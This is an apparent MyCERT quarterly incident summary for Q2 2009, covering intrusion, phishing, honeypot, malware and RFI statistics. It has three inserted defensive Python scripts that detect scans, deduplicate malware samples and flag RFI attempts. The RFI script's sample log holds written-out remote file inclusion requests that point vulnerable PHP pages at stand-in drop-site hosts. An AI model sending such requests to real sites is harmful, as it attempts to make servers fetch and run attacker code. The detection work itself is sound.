MyCERT Advisories

MyCERT Advisories, Alerts and Summaries for the year 2009
MS-224.062009: MyCERT  2nd Quarter 2009 Summary Report

29 June 2009

Introduction

This Quarterly summary provides an overview of activities carried out by MyCERT related to computer security incident handling and trends observed from the research network. The summary highlights statistics of categories of incidents handled by MyCERT in Q2 2009, security advisories released to MyCERT’s constituents, the Malaysian Internet users, and other activities carried out by MyCERT staff. Do take note that the statistics provided reflect only the total number of incidents handled by MyCERT and not elements such as monetary value or repercussion of the incidents. Computer security incidents handled by MyCERT are those that occur or originate within the Malaysian domain or IP space. MyCERT works closely with other local and global entities to resolve computer security incidents.

Incidents Trends Q2 2009

From April to June 2009, MyCERT, via its Cyber999 service, handled a total of 883 incidents. These incidents were referred to MyCERT by members of its constituency and by security teams from abroad, in addition to MyCERT’s own proactive monitoring efforts.

The following graph shows the total incidents handled by MyCERT in Q2 2009.





In Q2 2009, system intrusion and fraud recorded high numbers of incidents, representing 54% and 16% of incidents handled respectively. System intrusion incidents are generally attributed to web defacement. MyCERT observed that the main cause of defacements was vulnerable web applications. Fraud incidents are mostly phishing sites impersonating local and foreign institutions. In Q2 2009, MyCERT handled about 43 phishing sites and phishing emails, with the majority of phishing sites targeting local brands. MyCERT handles both the source of the phishing emails and the removal of the phishing sites by the affected Internet Service Providers (ISPs). Drones and malicious codes accounted for 13% of the total incidents handled in Q2 2009. Other examples of incidents within these categories are active botnet controllers and the hosting of malware or malware configuration files.


 

The following graph shows the breakdown of domains defaced in Q2 2009. Of the 454 websites defaced in Q2 2009, 65% have .com or .com.my extensions. Defacers generally target web applications that are prone to SQL injection or sites that are otherwise not secured.


Advisories and Alerts

In Q2 2009, MyCERT issued a total of 16 advisories and alerts for its constituency. Most of the advisories in Q2 involved popular end-user applications such as Adobe PDF Reader, Adobe Flash, Microsoft Office PowerPoint, Mozilla Firefox and Microsoft Internet Explorer. Attackers often compromise end users’ computers by exploiting vulnerabilities in these applications. Generally, the attacker tricks the user into opening a specially crafted file (e.g. a PDF document) or web page.

Readers can visit the following URL for the advisories and alerts released by MyCERT in 2009.


CyberSecurity Malaysia Research Network

Apart from the Cyber999 service, MyCERT also observes activities on its research network and conducts analysis of Internet threats and trends. The overall objectives of this initiative are as follows:

  • To observe the network for suspicious traffic and simultaneously monitor for the occurrence of known malicious attacks.
  • To observe attacker behaviours in order to learn new techniques being deployed.
  • To determine the popular techniques currently in use, as well as to confirm the continued use of old and well-known attack techniques.
  • To compile and analyze sufficient relevant information so that the results can be used to alert the community at large to the possibility of imminent cyber attacks on local networks.

1. Network Activities

The following is a summary derived from MyCERT’s research network for Quarter 2, 2009. The research network has no real production value, and as such any traffic that reaches it is suspicious in nature.


As our research network is dominated by web-based honeypots and emulated Windows services, most of the signatures relate to web-based attacks and Windows exploitation. Figure 1.0 shows the pie chart of network activities. For this quarter, we grouped all scanning activities into a single IDS signature category. We still observed scanning activity looking for port 5900, the port used by VNC (Virtual Network Computing). VNC is a graphical desktop-sharing system that uses the RFB protocol to remotely control another computer. The noise from scanning activities contributes most of our statistics for Q2.



Figure 1.0 shows the top ten alerts generated by the CyberSecurity Malaysia Research Network intrusion detection systems. More than 70% of the alerts generated relate to port scanning, which shows that this technique is used to search a network host for open ports, most probably to find a specific vulnerability to exploit and launch a real attack once the vulnerabilities have been found.

The chart also shows that 20% of alerts are from WEB PHP Remote File Inclusion (RFI). The high number of alerts generated is due to the distributed deployment of a web component used to research Remote File Inclusion (RFI) attacks. Generally, activities on port 22 are related to brute forcing, most of which is automated or carried out by compromised machines.
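The two noisiest behaviours the report attributes to its sensors, port scanning (one source probing many ports, including VNC on 5900) and SSH brute forcing on port 22, can be picked out of connection records with a sliding-window count. The script below is an added example, not MyCERT's sensor or IDS code: the flow records, the field layout (timestamp, source IP, destination port, outcome) and the thresholds are all constructed for this illustration.

```python
# Added example: sliding-window detection of port scanning and SSH brute forcing
# over constructed connection records. Not MyCERT's code; the record format,
# sample addresses and thresholds are assumptions made for this illustration.
from collections import defaultdict

# Constructed records: (timestamp_seconds, src_ip, dst_port, outcome).
# "syn" is a bare connection attempt; "auth_fail"/"auth_ok" are login results
# reported by an emulated SSH service.
SAMPLE_FLOWS = [
    (0,  "198.51.100.7", 21,   "syn"),
    (1,  "198.51.100.7", 22,   "syn"),
    (2,  "198.51.100.7", 80,   "syn"),
    (3,  "198.51.100.7", 445,  "syn"),
    (4,  "198.51.100.7", 5900, "syn"),
    (5,  "198.51.100.7", 3389, "syn"),
    (10, "203.0.113.9",  22,   "auth_fail"),
    (11, "203.0.113.9",  22,   "auth_fail"),
    (12, "203.0.113.9",  22,   "auth_fail"),
    (13, "203.0.113.9",  22,   "auth_fail"),
    (14, "203.0.113.9",  22,   "auth_fail"),
    (15, "203.0.113.9",  22,   "auth_fail"),
    (20, "192.0.2.5",    80,   "syn"),
    (21, "192.0.2.5",    80,   "syn"),
    (30, "192.0.2.44",   5900, "syn"),
]

SCAN_PORT_THRESHOLD = 5    # distinct destination ports from one source in the window
BRUTE_FAIL_THRESHOLD = 5   # SSH authentication failures from one source in the window
WINDOW_SECONDS = 60        # assumed detection window

def detect_scanners(flows, threshold=SCAN_PORT_THRESHOLD, window=WINDOW_SECONDS):
    """Return {src_ip: all distinct ports touched} for every source that hit at
    least `threshold` distinct destination ports within `window` seconds."""
    by_src = defaultdict(list)
    for ts, src, port, _ in sorted(flows):
        by_src[src].append((ts, port))
    scanners = {}
    for src, events in by_src.items():
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it fits within `window` seconds
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({p for _, p in events[start:end + 1]}) >= threshold:
                scanners[src] = sorted({p for _, p in events})
                break
    return scanners

def detect_ssh_bruteforce(flows, threshold=BRUTE_FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Return {src_ip: total failures} for sources with at least `threshold`
    SSH authentication failures within `window` seconds."""
    fails = defaultdict(list)
    for ts, src, port, outcome in sorted(flows):
        if port == 22 and outcome == "auth_fail":
            fails[src].append(ts)
    offenders = {}
    for src, times in fails.items():
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                offenders[src] = len(times)
                break
    return offenders

def vnc_probes(flows):
    """Sources that touched TCP/5900 (VNC), the port the report singles out."""
    return sorted({src for _, src, port, _ in flows if port == 5900})

def summarize(flows):
    return {
        "scanning_sources": detect_scanners(flows),
        "ssh_bruteforce_sources": detect_ssh_bruteforce(flows),
        "vnc_probe_sources": vnc_probes(flows),
    }

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_FLOWS).items():
        print(f"{key}: {value}")
```

A source that repeatedly hits a single port (192.0.2.5 above) is not flagged as a scanner, which is the distinction the report's grouping relies on; thresholds and window length should be tuned to the sensor's own traffic before use.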

2. Malware tracking

Software is considered malicious (malware) based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, trojan horses, most rootkits, spyware, dishonest adware, crimeware and other malicious and unwanted software. Malware is not the same as defective software, that is, software that has a legitimate purpose but contains harmful bugs.

MyCERT has been collecting malware samples automatically since 2007. Of the 7734 binaries collected in the first quarter of 2009, 760 were unique (based on MD5 hash). For the second quarter of 2009, 9561 malware samples were collected, of which 672 were unique (based on MD5 hash). The number of malware samples collected is increasing while the number of unique samples collected is decreasing.

Figure 1.0 below shows the distribution of the sources of attacks on our research network, grouped by country. The list of countries reflects the IP address coverage of our research network and the way infected computers scan for new targets. The statistics show little difference compared to the previous quarter.



Laying the graph onto a map shows the global distribution of binaries downloaded by the sensors in the second quarter of 2009.




Attackers trying to spread malware made active use of the malware sample called Virut during Q2 compared to Q1; hence we observed more samples collected for Virut. Figure 3.0 shows the malware variants scanned with multiple antivirus software. We use three free antivirus products to identify the malware we collect. Below are the top 10 malware classifications based on the three antivirus products used by MyCERT. MyCERT proactively handled incidents related to malware hosting and escalated the relevant information to the respective parties such as ISPs and international Computer Security Incident Response Teams (CSIRTs).
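The two figures the report derives from its collection, samples collected versus samples unique by MD5 and the top classifications across three antivirus engines, come from a straightforward dedup-and-tally over the captured files. The script below is an added example and not MyCERT's collection pipeline: the "binaries" are constructed byte strings, the engine names and detection labels are made up, and a sample no engine recognises is counted as "undetected" so that coverage gaps stay visible.

```python
# Added example: deduplicate collected files by MD5 and tally antivirus labels.
# Not MyCERT's code; sample bytes, engine names and labels are constructed.
import hashlib
from collections import Counter

def md5_hex(data: bytes) -> str:
    """MD5 as the report's dedup key. Adequate for spotting identical files;
    use SHA-256 as well where collision resistance matters."""
    return hashlib.md5(data).hexdigest()

# Constructed stand-ins for collected binaries (the same bytes pushed repeatedly,
# as one worm spreading from many infected hosts appears to a sensor).
SAMPLE_A = b"constructed-sample-A" * 8
SAMPLE_B = b"constructed-sample-B" * 8
SAMPLE_C = b"constructed-sample-C" * 8
SAMPLE_D = b"constructed-sample-D" * 8   # known to no engine below
COLLECTED_Q1 = [SAMPLE_A, SAMPLE_B, SAMPLE_C, SAMPLE_A]
COLLECTED_Q2 = [SAMPLE_A, SAMPLE_A, SAMPLE_B, SAMPLE_A, SAMPLE_A, SAMPLE_B, SAMPLE_D]

# Constructed detection names from three hypothetical engines, keyed by MD5.
ENGINE_LABELS = {
    "engine-1": {md5_hex(SAMPLE_A): "Worm.Constructed.A",
                 md5_hex(SAMPLE_B): "Trojan.Constructed.B"},
    "engine-2": {md5_hex(SAMPLE_A): "Worm.Constructed.A",
                 md5_hex(SAMPLE_B): "Trojan.Constructed.B",
                 md5_hex(SAMPLE_C): "Virus.Constructed.C"},
    "engine-3": {md5_hex(SAMPLE_A): "Worm.Constructed.A"},
}

def dedupe_by_md5(binaries):
    """Map each distinct MD5 to how many times that exact file was collected."""
    counts = Counter()
    for data in binaries:
        counts[md5_hex(data)] += 1
    return counts

def quarter_stats(binaries):
    """Collected versus unique counts for one quarter, plus how many copies of
    each unique file were seen on average (rising when a few families dominate)."""
    uniq = dedupe_by_md5(binaries)
    return {
        "collected": len(binaries),
        "unique": len(uniq),
        "collections_per_unique": round(len(binaries) / len(uniq), 2),
    }

def top_classifications(unique_hashes, engine_labels, n=10):
    """Tally detection names across all engines for the unique samples.
    A hash no engine labels is counted once as 'undetected'."""
    tally = Counter()
    for h in unique_hashes:
        labels = [table[h] for table in engine_labels.values() if h in table]
        if not labels:
            tally["undetected"] += 1
        for label in labels:
            tally[label] += 1
    return tally.most_common(n)

if __name__ == "__main__":
    for name, batch in (("Q1", COLLECTED_Q1), ("Q2", COLLECTED_Q2)):
        print(name, quarter_stats(batch))
        print(name, top_classifications(dedupe_by_md5(batch), ENGINE_LABELS))
```

Because the tally counts one entry per engine, a family every engine detects ranks above one that only a single engine names; real vendor labels for the same family differ, so a production version would normalise names before counting.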








3. RFI Tracking

In Q2 2009, MyCERT detected more than 431,550 RFI attack attempts and recorded about 3652 unique domains used as drop sites. MyCERT proactively handled these incidents and escalated the relevant information to the respective parties such as ISPs and international Computer Security Incident Response Teams (CSIRTs). Figure 4.0 shows the top sources of attacks, and figure 5.0 a visualization of the common names used in RFI scripts.
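The RFI figures above (attempt count, unique drop-site domains, top sources and common script names), and the WEB PHP RFI alerts mentioned in the network activity section, can all be derived from web server logs by flagging requests whose query parameter value is itself an absolute URL. The script below is an added example, not MyCERT's RFI research component: the access-log lines are constructed in Apache combined format, and the hosts, paths and script names in them are made up.

```python
# Added example: detect remote file inclusion attempts in web access logs and
# summarise them the way the report does. Not MyCERT's code; the log lines and
# every host, path and file name in them are constructed for this illustration.
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

SAMPLE_LOG = """\
203.0.113.8 - - [12/May/2009:10:01:02 +0800] "GET /index.php?page=http://drop-site.example/cmd.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.8 - - [12/May/2009:10:01:05 +0800] "GET /forum/show.php?inc=http://drop-site.example/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/May/2009:10:02:17 +0800] "GET /gallery.php?path=http://203.0.113.77/~user/id.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [12/May/2009:10:03:00 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [12/May/2009:10:04:40 +0800] "GET /index.php?page=ftp://other.example/shell/cmd.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is an absolute URL is the RFI marker: a PHP include()
# with allow_url_include enabled would fetch and execute it from the remote host.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_rfi_attempts(log_text):
    """One record per request that passes a remote URL in a query parameter."""
    attempts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        query = urlsplit(rec["target"]).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_URL_RE.match(value):
                continue
            # Trailing "?" marks are appended so that whatever the vulnerable
            # script concatenates after the URL becomes a harmless query string.
            url = value.rstrip("?")
            parts = urlsplit(url)
            attempts.append({
                "src": rec["src"],
                "param": param,
                "url": url,
                "drop_domain": parts.hostname,
                "script": parts.path.rsplit("/", 1)[-1],
            })
    return attempts

def summarize_rfi(log_text, top_n=5):
    """The counts the report states: attempts, unique drop-site domains,
    top attacking sources and the most common script names."""
    attempts = find_rfi_attempts(log_text)
    return {
        "attempts": len(attempts),
        "unique_drop_domains": len({a["drop_domain"] for a in attempts}),
        "top_sources": Counter(a["src"] for a in attempts).most_common(top_n),
        "common_script_names": Counter(a["script"] for a in attempts).most_common(top_n),
    }

if __name__ == "__main__":
    for key, value in summarize_rfi(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The drop-site domain, not the attacking IP, is the value worth escalating to the hosting ISP, since the source is usually itself a compromised machine; on the application side, disabling allow_url_include and never passing user input to include() removes the vulnerability class entirely.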







Other Activities

MyCERT staff were invited to conduct talks and training in various locations in Q2 2009. The following is a brief list of the talks and training conducted by MyCERT in Q2 2009:

  • May 2009 - APWG Counter-eCrime Operations Summit (CeCOS III), Barcelona, Spain, Talk on Malaysia National Report and Case Study.
  • May 2009 - Update, F-Secure Tower, KL, Incident Handling and Threats.
  • May 2009 - MSC OSCON 2009, KL, Training on Practical Analysis with OSS Tools for Web Intrusion.
  • May 2009 - Internet Security Awareness, Brunei, Talk on Internet Security.
  • May 2009 - Seminar Keselamatan ICT, Pulau Pinang, Talk on IT Security.
  • June 2009 - Seminar ICT Kebangsaan, Putrajaya, Talk on Security Risk, How Safe is Safe.
  • June 2009 - MSC OSCON 2009, KL, Web Security: Are Your Web Servers Part of Botnet.

Conclusion

In Q2 2009, no crisis or outbreak was observed. Nevertheless, users and organizations are advised to always take measures to protect their systems and networks from threats. MyCERT encourages Malaysian Internet users to be constantly vigilant about the latest computer security threats.

MyCERT can be reached for assistance at:
Malaysia Computer Emergency Response Team (MyCERT)
E-mail:
mycert@mycert.org.my
Cyber999 Hotline: 1 300 88 2999
Phone: (603) 8992 6969
Fax: (603) 8945 3442
Phone: 019-266 5850
SMS: Type CYBER999 report to 15888
http://www.mycert.org.my/

Please refer to MyCERT’s website for the latest updates to this Quarterly Summary.